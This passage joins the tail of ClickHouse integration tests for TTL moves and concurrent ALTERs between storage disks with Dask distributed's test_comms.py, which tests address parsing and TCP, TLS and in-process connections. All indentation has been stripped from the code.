d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
if positive:
expected_disks = {"external"}
else:
expected_disks = {"jbod1", "jbod2"}
check_used_disks_with_retry(node1, name, expected_disks, 50)
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
for i in range(50):
rows_count = int(node1.query("SELECT count() FROM {name}".format(name=name)).strip())
if positive:
if rows_count == 0:
break
else:
if rows_count == 3:
break
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
time.sleep(0.5)
if positive:
assert rows_count == 0
else:
assert rows_count == 3
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt","MergeTree()"),
("concurrently_altering_ttl_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'", "TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
try:
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
except QueryRuntimeException:
pass
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
except:
pass
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flacky test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
time.sleep(1)
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
        # Fill up jbod1 to force ClickHouse to move partition 1 to 'external'.
node1.query("INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
time.sleep(1)
        # If the long SELECT still holds the old copy of the part on 'external', the new move to 'external' should fail.
assert node1.query("SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
test_comms.py
|
from __future__ import print_function, division, absolute_import
from functools import partial
import os
import sys
import threading
import warnings
import pytest
from tornado import gen, ioloop, locks, queues
from tornado.concurrent import Future
from distributed.compatibility import PY3
from distributed.metrics import time
from distributed.utils import get_ip, get_ipv6
from distributed.utils_test import (gen_test, requires_ipv6, has_ipv6,
get_cert, get_server_ssl_context,
get_client_ssl_context)
from distributed.utils_test import loop # noqa: F401
from distributed.protocol import (to_serialize, Serialized, serialize,
deserialize)
from distributed.comm import (tcp, inproc, connect, listen, CommClosedError,
parse_address, parse_host_port,
unparse_host_port, resolve_address,
get_address_host, get_local_address_for)
EXTERNAL_IP4 = get_ip()
if has_ipv6():
with warnings.catch_warnings(record=True):
warnings.simplefilter('always')
EXTERNAL_IP6 = get_ipv6()
ca_file = get_cert('tls-ca-cert.pem')
# The Subject field of our test certs
cert_subject = (
(('countryName', 'XY'),),
(('localityName', 'Dask-distributed'),),
(('organizationName', 'Dask'),),
(('commonName', 'localhost'),)
)
def check_tls_extra(info):
assert isinstance(info, dict)
assert info['peercert']['subject'] == cert_subject
assert 'cipher' in info
cipher_name, proto_name, secret_bits = info['cipher']
# Most likely
assert 'AES' in cipher_name
assert 'TLS' in proto_name
assert secret_bits >= 128
tls_kwargs = dict(listen_args={'ssl_context': get_server_ssl_context()},
connect_args={'ssl_context': get_client_ssl_context()})
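# get_comm_pair() starts a listener on the given address, connects a client to
# the listener's contact address and yields both ends of the connection as a
# (client_comm, server_comm) pair.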
@gen.coroutine
def get_comm_pair(listen_addr, listen_args=None, connect_args=None,
**kwargs):
q = queues.Queue()
def handle_comm(comm):
q.put(comm)
listener = listen(listen_addr, handle_comm,
connection_args=listen_args, **kwargs)
listener.start()
comm = yield connect(listener.contact_address,
connection_args=connect_args, **kwargs)
serv_comm = yield q.get()
raise gen.Return((comm, serv_comm))
def get_tcp_comm_pair(**kwargs):
return get_comm_pair('tcp://', **kwargs)
def get_tls_comm_pair(**kwargs):
kwargs.update(tls_kwargs)
return get_comm_pair('tls://', **kwargs)
def get_inproc_comm_pair(**kwargs):
return get_comm_pair('inproc://', **kwargs)
@gen.coroutine
def debug_loop():
"""
Debug helper
"""
while True:
loop = ioloop.IOLoop.current()
print('.', loop, loop._handlers)
yield gen.sleep(0.50)
#
# Test utility functions
#
def test_parse_host_port():
f = parse_host_port
assert f('localhost:123') == ('localhost', 123)
assert f('127.0.0.1:456') == ('127.0.0.1', 456)
assert f('localhost:123', 80) == ('localhost', 123)
assert f('localhost', 80) == ('localhost', 80)
with pytest.raises(ValueError):
f('localhost')
assert f('[::1]:123') == ('::1', 123)
assert f('[fe80::1]:123', 80) == ('fe80::1', 123)
assert f('[::1]', 80) == ('::1', 80)
with pytest.raises(ValueError):
f('[::1]')
with pytest.raises(ValueError):
f('::1:123')
with pytest.raises(ValueError):
f('::1')
def test_unparse_host_port():
f = unparse_host_port
assert f('localhost', 123) == 'localhost:123'
assert f('127.0.0.1', 123) == '127.0.0.1:123'
assert f('::1', 123) == '[::1]:123'
assert f('[::1]', 123) == '[::1]:123'
assert f('127.0.0.1') == '127.0.0.1'
assert f('127.0.0.1', 0) == '127.0.0.1'
assert f('127.0.0.1', None) == '127.0.0.1'
assert f('127.0.0.1', '*') == '127.0.0.1:*'
assert f('::1') == '[::1]'
assert f('[::1]') == '[::1]'
assert f('::1', '*') == '[::1]:*'
def test_get_address_host():
f = get_address_host
assert f('tcp://127.0.0.1:123') == '127.0.0.1'
assert f('inproc://%s/%d/123' % (get_ip(), os.getpid())) == get_ip()
def test_resolve_address():
f = resolve_address
assert f('tcp://127.0.0.1:123') == 'tcp://127.0.0.1:123'
assert f('127.0.0.2:789') == 'tcp://127.0.0.2:789'
assert f('tcp://0.0.0.0:456') == 'tcp://0.0.0.0:456'
assert f('tcp://0.0.0.0:456') == 'tcp://0.0.0.0:456'
if has_ipv6():
assert f('tcp://[::1]:123') == 'tcp://[::1]:123'
assert f('tls://[::1]:123') == 'tls://[::1]:123'
# OS X returns '::0.0.0.2' as canonical representation
assert f('[::2]:789') in ('tcp://[::2]:789',
'tcp://[::0.0.0.2]:789')
assert f('tcp://[::]:123') == 'tcp://[::]:123'
assert f('localhost:123') == 'tcp://127.0.0.1:123'
assert f('tcp://localhost:456') == 'tcp://127.0.0.1:456'
assert f('tls://localhost:456') == 'tls://127.0.0.1:456'
def test_get_local_address_for():
f = get_local_address_for
assert f('tcp://127.0.0.1:80') == 'tcp://127.0.0.1'
assert f('tcp://8.8.8.8:4444') == 'tcp://' + get_ip()
if has_ipv6():
assert f('tcp://[::1]:123') == 'tcp://[::1]'
inproc_arg = 'inproc://%s/%d/444' % (get_ip(), os.getpid())
inproc_res = f(inproc_arg)
assert inproc_res.startswith('inproc://')
assert inproc_res != inproc_arg
#
# Test concrete transport APIs
#
@gen_test()
def test_tcp_specific():
"""
Test concrete TCP API.
"""
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('tcp://' + host)
assert comm.extra_info == {}
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
listener = tcp.TCPListener('localhost', handle_comm)
listener.start()
host, port = listener.get_host_port()
assert host in ('localhost', '127.0.0.1', '::1')
assert port > 0
connector = tcp.TCPConnector()
l = []
@gen.coroutine
def client_communicate(key, delay=0):
addr = '%s:%d' % (host, port)
comm = yield connector.connect(addr)
assert comm.peer_address == 'tcp://' + addr
assert comm.extra_info == {}
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
@gen_test()
def test_tls_specific():
"""
Test concrete TLS API.
"""
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('tls://' + host)
check_tls_extra(comm.extra_info)
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
server_ctx = get_server_ssl_context()
client_ctx = get_client_ssl_context()
listener = tcp.TLSListener('localhost', handle_comm,
ssl_context=server_ctx)
listener.start()
host, port = listener.get_host_port()
assert host in ('localhost', '127.0.0.1', '::1')
assert port > 0
connector = tcp.TLSConnector()
l = []
@gen.coroutine
def client_communicate(key, delay=0):
addr = '%s:%d' % (host, port)
comm = yield connector.connect(addr, ssl_context=client_ctx)
assert comm.peer_address == 'tls://' + addr
check_tls_extra(comm.extra_info)
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
N = 100
futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
@gen_test()
def test_comm_failure_threading():
"""
When we fail to connect, make sure we don't make a lot
of threads.
    We only assert for PY3, because the thread limit is only set
    for Python 3. See the GitHub PR #2403 discussion for details.
"""
@gen.coroutine
def sleep_for_60ms():
max_thread_count = 0
for x in range(60):
yield gen.sleep(0.001)
thread_count = threading.active_count()
if thread_count > max_thread_count:
max_thread_count = thread_count
raise gen.Return(max_thread_count)
original_thread_count = threading.active_count()
# tcp.TCPConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
yield connect("tcp://localhost:28400", 0.052)
max_thread_count = yield sleep_future
# 2 is the number set by BaseTCPConnector.executor (ThreadPoolExecutor)
if PY3:
assert max_thread_count <= 2 + original_thread_count
# tcp.TLSConnector()
sleep_future = sleep_for_60ms()
with pytest.raises(IOError):
yield connect("tls://localhost:28400", 0.052,
connection_args={'ssl_context': get_client_ssl_context()})
max_thread_count = yield sleep_future
if PY3:
assert max_thread_count <= 2 + original_thread_count
@gen.coroutine
def check_inproc_specific(run_client):
"""
Test concrete InProc API.
"""
listener_addr = inproc.global_manager.new_address()
addr_head = listener_addr.rpartition('/')[0]
client_addresses = set()
N_MSGS = 3
@gen.coroutine
def handle_comm(comm):
assert comm.peer_address.startswith('inproc://' + addr_head)
client_addresses.add(comm.peer_address)
for i in range(N_MSGS):
msg = yield comm.read()
msg['op'] = 'pong'
yield comm.write(msg)
yield comm.close()
listener = inproc.InProcListener(listener_addr, handle_comm)
listener.start()
assert listener.listen_address == listener.contact_address == 'inproc://' + listener_addr
connector = inproc.InProcConnector(inproc.global_manager)
l = []
@gen.coroutine
def client_communicate(key, delay=0):
comm = yield connector.connect(listener_addr)
assert comm.peer_address == 'inproc://' + listener_addr
for i in range(N_MSGS):
yield comm.write({'op': 'ping', 'data': key})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
with pytest.raises(CommClosedError):
yield comm.read()
yield comm.close()
client_communicate = partial(run_client, client_communicate)
yield client_communicate(key=1234)
# Many clients at once
N = 20
futures = [client_communicate(key=i, delay=0.001) for i in range(N)]
yield futures
assert set(l) == {1234} | set(range(N))
assert len(client_addresses) == N + 1
assert listener.contact_address not in client_addresses
def run_coro(func, *args, **kwargs):
return func(*args, **kwargs)
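# run_coro_in_thread() runs a coroutine to completion on a fresh IOLoop in a
# separate thread and hands the result (or exception) back to the calling loop
# through a Future; check_inproc_specific() uses it to exercise the same client
# code from a different thread.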
def run_coro_in_thread(func, *args, **kwargs):
fut = Future()
main_loop = ioloop.IOLoop.current()
def run():
thread_loop = ioloop.IOLoop() # need fresh IO loop for run_sync()
try:
res = thread_loop.run_sync(partial(func, *args, **kwargs),
timeout=10)
except Exception:
main_loop.add_callback(fut.set_exc_info, sys.exc_info())
else:
main_loop.add_callback(fut.set_result, res)
finally:
thread_loop.close()
t = threading.Thread(target=run)
t.start()
return fut
@gen_test()
def test_inproc_specific_same_thread():
yield check_inproc_specific(run_coro)
@gen_test()
def test_inproc_specific_different_threads():
yield check_inproc_specific(run_coro_in_thread)
#
# Test communications through the abstract API
#
@gen.coroutine
def check_client_server(addr, check_listen_addr=None, check_contact_addr=None,
listen_args=None, connect_args=None):
"""
Abstract client / server test.
"""
@gen.coroutine
def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == bound_scheme
msg = yield comm.read()
assert msg['op'] == 'ping'
msg['op'] = 'pong'
yield comm.write(msg)
msg = yield comm.read()
assert msg['op'] == 'foobar'
yield comm.close()
# Arbitrary connection args should be ignored
listen_args = listen_args or {'xxx': 'bar'}
connect_args = connect_args or {'xxx': 'foo'}
listener = listen(addr, handle_comm, connection_args=listen_args)
listener.start()
# Check listener properties
bound_addr = listener.listen_address
bound_scheme, bound_loc = parse_address(bound_addr)
assert bound_scheme in ('inproc', 'tcp', 'tls')
assert bound_scheme == parse_address(addr)[0]
if check_listen_addr is not None:
check_listen_addr(bound_loc)
contact_addr = listener.contact_address
contact_scheme, contact_loc = parse_address(contact_addr)
assert contact_scheme == bound_scheme
if check_contact_addr is not None:
check_contact_addr(contact_loc)
else:
assert contact_addr == bound_addr
# Check client <-> server comms
l = []
@gen.coroutine
def client_communicate(key, delay=0):
comm = yield connect(listener.contact_address,
connection_args=connect_args)
assert comm.peer_address == listener.contact_address
yield comm.write({'op': 'ping', 'data': key})
yield comm.write({'op': 'foobar'})
if delay:
yield gen.sleep(delay)
msg = yield comm.read()
assert msg == {'op': 'pong', 'data': key}
l.append(key)
yield comm.close()
yield client_communicate(key=1234)
# Many clients at once
futures = [client_communicate(key=i, delay=0.05) for i in range(20)]
yield futures
assert set(l) == {1234} | set(range(20))
listener.stop()
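# tcp_eq()/tls_eq() and inproc_check() build the checker callbacks used by
# check_client_server(): they verify that a bound or contact address has the
# expected host and port (or, when no port is expected, an ephemeral one).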
def tcp_eq(expected_host, expected_port=None):
def checker(loc):
host, port = parse_host_port(loc)
assert host == expected_host
if expected_port is not None:
assert port == expected_port
else:
assert 1023 < port < 65536
return checker
tls_eq = tcp_eq
def inproc_check():
expected_ip = get_ip()
expected_pid = os.getpid()
def checker(loc):
ip, pid, suffix = loc.split('/')
assert ip == expected_ip
assert int(pid) == expected_pid
return checker
@gen_test()
def test_default_client_server_ipv4():
# Default scheme is (currently) TCP
yield check_client_server('127.0.0.1', tcp_eq('127.0.0.1'))
yield check_client_server('127.0.0.1:3201', tcp_eq('127.0.0.1', 3201))
yield check_client_server('0.0.0.0',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('0.0.0.0:3202',
tcp_eq('0.0.0.0', 3202), tcp_eq(EXTERNAL_IP4, 3202))
# IPv4 is preferred for the bound address
yield check_client_server('',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server(':3203',
tcp_eq('0.0.0.0', 3203), tcp_eq(EXTERNAL_IP4, 3203))
@requires_ipv6
@gen_test()
def test_default_client_server_ipv6():
yield check_client_server('[::1]', tcp_eq('::1'))
yield check_client_server('[::1]:3211', tcp_eq('::1', 3211))
yield check_client_server('[::]', tcp_eq('::'), tcp_eq(EXTERNAL_IP6))
yield check_client_server('[::]:3212', tcp_eq('::', 3212), tcp_eq(EXTERNAL_IP6, 3212))
@gen_test()
def test_tcp_client_server_ipv4():
yield check_client_server('tcp://127.0.0.1', tcp_eq('127.0.0.1'))
yield check_client_server('tcp://127.0.0.1:3221', tcp_eq('127.0.0.1', 3221))
yield check_client_server('tcp://0.0.0.0',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('tcp://0.0.0.0:3222',
tcp_eq('0.0.0.0', 3222), tcp_eq(EXTERNAL_IP4, 3222))
yield check_client_server('tcp://',
tcp_eq('0.0.0.0'), tcp_eq(EXTERNAL_IP4))
yield check_client_server('tcp://:3223',
tcp_eq('0.0.0.0', 3223), tcp_eq(EXTERNAL_IP4, 3223))
@requires_ipv6
@gen_test()
def test_tcp_client_server_ipv6():
yield check_client_server('tcp://[::1]', tcp_eq('::1'))
yield check_client_server('tcp://[::1]:3231', tcp_eq('::1', 3231))
yield check_client_server('tcp://[::]',
tcp_eq('::'), tcp_eq(EXTERNAL_IP6))
yield check_client_server('tcp://[::]:3232',
tcp_eq('::', 3232), tcp_eq(EXTERNAL_IP6, 3232))
@gen_test()
def test_tls_client_server_ipv4():
yield check_client_server('tls://127.0.0.1', tls_eq('127.0.0.1'), **tls_kwargs)
yield check_client_server('tls://127.0.0.1:3221', tls_eq('127.0.0.1', 3221), **tls_kwargs)
yield check_client_server('tls://', tls_eq('0.0.0.0'),
tls_eq(EXTERNAL_IP4), **tls_kwargs)
@requires_ipv6
@gen_test()
def test_tls_client_server_ipv6():
yield check_client_server('tls://[::1]', tls_eq('::1'), **tls_kwargs)
@gen_test()
def test_inproc_client_server():
yield check_client_server('inproc://', inproc_check())
yield check_client_server(inproc.new_address(), inproc_check())
#
# TLS certificate handling
#
@gen_test()
def test_tls_reject_certificate():
cli_ctx = get_client_ssl_context()
serv_ctx = get_server_ssl_context()
# These certs are not signed by our test CA
bad_cert_key = ('tls-self-signed-cert.pem', 'tls-self-signed-key.pem')
bad_cli_ctx = get_client_ssl_context(*bad_cert_key)
bad_serv_ctx = get_server_ssl_context(*bad_cert_key)
@gen.coroutine
def handle_comm(comm):
scheme, loc = parse_address(comm.peer_address)
assert scheme == 'tls'
yield comm.close()
# Listener refuses a connector not signed by the CA
listener = listen('tls://', handle_comm,
connection_args={'ssl_context': serv_ctx})
listener.start()
with pytest.raises(EnvironmentError) as excinfo:
yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': bad_cli_ctx})
# The wrong error is reported on Python 2, see https://github.com/tornadoweb/tornado/pull/2028
if sys.version_info >= (3,) and os.name != 'nt':
try:
# See https://serverfault.com/questions/793260/what-does-tlsv1-alert-unknown-ca-mean
assert "unknown ca" in str(excinfo.value)
except AssertionError:
if os.name == 'nt':
assert "An existing connection was forcibly closed" in str(excinfo.value)
else:
raise
# Sanity check
comm = yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': cli_ctx})
yield comm.close()
# Connector refuses a listener not signed by the CA
listener = listen('tls://', handle_comm,
connection_args={'ssl_context': bad_serv_ctx})
listener.start()
with pytest.raises(EnvironmentError) as excinfo:
yield connect(listener.contact_address, timeout=0.5,
connection_args={'ssl_context': cli_ctx})
# The wrong error is reported on Python 2, see https://github.com/tornadoweb/tornado/pull/2028
if sys.version_info >= (3,):
assert "certificate verify failed" in str(excinfo.value)
#
# Test communication closing
#
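# check_comm_closed_implicit(): the server closes its end right away, so the
# client's next write and next read are both expected to raise CommClosedError.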
@gen.coroutine
def check_comm_closed_implicit(addr, delay=None, listen_args=None,
connect_args=None):
@gen.coroutine
def handle_comm(comm):
yield comm.close()
listener = listen(addr, handle_comm, connection_args=listen_args)
listener.start()
contact_addr = listener.contact_address
comm = yield connect(contact_addr, connection_args=connect_args)
with pytest.raises(CommClosedError):
yield comm.write({})
comm = yield connect(contact_addr, connection_args=connect_args)
with pytest.raises(CommClosedError):
yield comm.read()
@gen_test()
def test_tcp_comm_closed_implicit():
yield check_comm_closed_implicit('tcp://127.0.0.1')
@gen_test()
def test_tls_comm_closed_implicit():
yield check_comm_closed_implicit('tls://127.0.0.1', **tls_kwargs)
@gen_test()
def test_inproc_comm_closed_implicit():
yield check_comm_closed_implicit(inproc.new_address())
@gen.coroutine
def check_comm_closed_explicit(addr, listen_args=None, connect_args=None):
a, b = yield get_comm_pair(addr, listen_args=listen_args, connect_args=connect_args)
a_read = a.read()
b_read = b.read()
yield a.close()
# In-flight reads should abort with CommClosedError
with pytest.raises(CommClosedError):
yield a_read
with pytest.raises(CommClosedError):
yield b_read
# New reads as well
with pytest.raises(CommClosedError):
yield a.read()
with pytest.raises(CommClosedError):
yield b.read()
# And writes
with pytest.raises(CommClosedError):
yield a.write({})
with pytest.raises(CommClosedError):
yield b.write({})
yield b.close()
@gen_test()
def test_tcp_comm_closed_explicit():
yield check_comm_closed_explicit('tcp://127.0.0.1')
@gen_test()
def test_tls_comm_closed_explicit():
yield check_comm_closed_explicit('tls://127.0.0.1', **tls_kwargs)
@gen_test()
def test_inproc_comm_closed_explicit():
yield check_comm_closed_explicit(inproc.new_address())
@gen_test()
def test_inproc_comm_closed_explicit_2():
listener_errors = []
@gen.coroutine
def handle_comm(comm):
# Wait
try:
yield comm.read()
except CommClosedError:
assert comm.closed()
listener_errors.append(True)
else:
comm.close()
listener = listen('inproc://', handle_comm)
listener.start()
contact_addr = listener.contact_address
comm = yield connect(contact_addr)
comm.close()
assert comm.closed()
start = time()
while len(listener_errors) < 1:
assert time() < start + 1
yield gen.sleep(0.01)
assert len(listener_errors) == 1
with pytest.raises(CommClosedError):
yield comm.read()
with pytest.raises(CommClosedError):
yield comm.write("foo")
comm = yield connect(contact_addr)
comm.write("foo")
with pytest.raises(CommClosedError):
yield comm.read()
with pytest.raises(CommClosedError):
yield comm.write("foo")
assert comm.closed()
comm = yield connect(contact_addr)
comm.write("foo")
start = time()
while not comm.closed():
yield gen.sleep(0.01)
assert time() < start + 2
comm.close()
comm.close()
#
# Various stress tests
#
@gen.coroutine
def check_connect_timeout(addr):
t1 = time()
with pytest.raises(IOError):
yield connect(addr, timeout=0.15)
dt = time() - t1
assert 1 >= dt >= 0.1
@gen_test()
def test_tcp_connect_timeout():
yield check_connect_timeout('tcp://127.0.0.1:44444')
@gen_test()
def test_inproc_connect_timeout():
yield check_connect_timeout(inproc.new_address())
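# check_many_listeners() opens 100 listeners on the same address spec and
# checks that each one is assigned a distinct listen and contact address.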
def check_many_listeners(addr):
@gen.coroutine
def handle_comm(comm):
pass
listeners = []
N = 100
for i in range(N):
listener = listen(addr, handle_comm)
listener.start()
listeners.append(listener)
assert len(set(l.listen_address for l in listeners)) == N
assert len(set(l.contact_address for l in listeners)) == N
for listener in listeners:
listener.stop()
@gen_test()
def test_tcp_many_listeners():
check_many_listeners('tcp://127.0.0.1')
check_many_listeners('tcp://0.0.0.0')
check_many_listeners('tcp://')
@gen_test()
def test_inproc_many_listeners():
check_many_listeners('inproc://')
#
# Test deserialization
#
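# check_listener_deserialize()/check_connector_deserialize() send one message
# through a listener (or connector) created with the given `deserialize` flag
# and pass whatever arrives to a caller-supplied checker.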
@gen.coroutine
def check_listener_deserialize(addr, deserialize, in_value, check_out):
q = queues.Queue()
@gen.coroutine
def handle_comm(comm):
msg = yield comm.read()
q.put_nowait(msg)
yield comm.close()
with listen(addr, handle_comm, deserialize=deserialize) as listener:
comm = yield connect(listener.contact_address)
yield comm.write(in_value)
out_value = yield q.get()
check_out(out_value)
yield comm.close()
@gen.coroutine
def check_connector_deserialize(addr, deserialize, in_value, check_out):
done = locks.Event()
@gen.coroutine
def handle_comm(comm):
yield comm.write(in_value)
yield done.wait()
yield comm.close()
with listen(addr, handle_comm) as listener:
comm = yield connect(listener.contact_address, deserialize=deserialize)
out_value = yield comm.read()
done.set()
yield comm.close()
check_out(out_value)
@gen.coroutine
def check_deserialize(addr):
"""
Check the "deserialize" flag on connect() and listen().
"""
# Test with Serialize and Serialized objects
msg = {'op': 'update',
'x': b'abc',
'to_ser': [to_serialize(123)],
'ser': Serialized(*serialize(456)),
}
msg_orig = msg.copy()
def check_out_false(out_value):
# Check output with deserialize=False
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop('to_ser')
ser = out_value.pop('ser')
expected_msg = msg_orig.copy()
del expected_msg['ser']
del expected_msg['to_ser']
assert out_value == expected_msg
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == 456
assert isinstance(to_ser, list)
to_ser, = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == 123
else:
assert to_ser == to_serialize(123)
def check_out_true(out_value):
# Check output with deserialize=True
expected_msg = msg.copy()
expected_msg['ser'] = 456
expected_msg['to_ser'] = [123]
assert out_value == expected_msg
yield check_listener_deserialize(addr, False, msg, check_out_false)
yield check_connector_deserialize(addr, False, msg, check_out_false)
yield check_listener_deserialize(addr, True, msg, check_out_true)
yield check_connector_deserialize(addr, True, msg, check_out_true)
# Test with long bytestrings, large enough to be transferred
# as a separate payload
    _uncompressible = os.urandom(1024 ** 2) * 4  # end size: 4 MB
msg = {'op': 'update',
'x': _uncompressible,
'to_ser': [to_serialize(_uncompressible)],
'ser': Serialized(*serialize(_uncompressible)),
}
msg_orig = msg.copy()
def check_out(deserialize_flag, out_value):
        # Check output for either value of the deserialize flag
assert sorted(out_value) == sorted(msg_orig)
out_value = out_value.copy() # in case transport passed the object as-is
to_ser = out_value.pop('to_ser')
ser = out_value.pop('ser')
expected_msg = msg_orig.copy()
del expected_msg['ser']
del expected_msg['to_ser']
assert out_value == expected_msg
if deserialize_flag:
assert isinstance(ser, (bytes, bytearray))
assert bytes(ser) == _uncompressible
else:
assert isinstance(ser, Serialized)
assert deserialize(ser.header, ser.frames) == _uncompressible
assert isinstance(to_ser, list)
to_ser, = to_ser
# The to_serialize() value could have been actually serialized
# or not (it's a transport-specific optimization)
if isinstance(to_ser, Serialized):
assert deserialize(to_ser.header, to_ser.frames) == _uncompressible
else:
assert to_ser == to_serialize(_uncompressible)
yield check_listener_deserialize(addr, False, msg, partial(check_out, False))
yield check_connector_deserialize(addr, False, msg, partial(check_out, False))
yield check_listener_deserialize(addr, True, msg, partial(check_out, True))
yield check_connector_deserialize(addr, True, msg, partial(check_out, True))
@pytest.mark.xfail(reason='intermittent failure on windows')
@gen_test()
def test_tcp_deserialize():
yield check_deserialize('tcp://')
@gen_test()
def test_inproc_deserialize():
yield check_deserialize('inproc://')
@gen.coroutine
def check_deserialize_roundtrip(addr):
"""
Sanity check round-tripping with "deserialize" on and off.
"""
# Test with long bytestrings, large enough to be transferred
# as a separate payload
_uncompressible = os.urandom(1024 ** 2) * 4 # end size: 4 MB
msg = {'op': 'update',
'x': _uncompressible,
'to_ser': [to_serialize(_uncompressible)],
'ser': Serialized(*serialize(_uncompressible)),
}
for should_deserialize in (True, False):
a, b = yield get_comm_pair(addr, deserialize=should_deserialize)
yield a.write(msg)
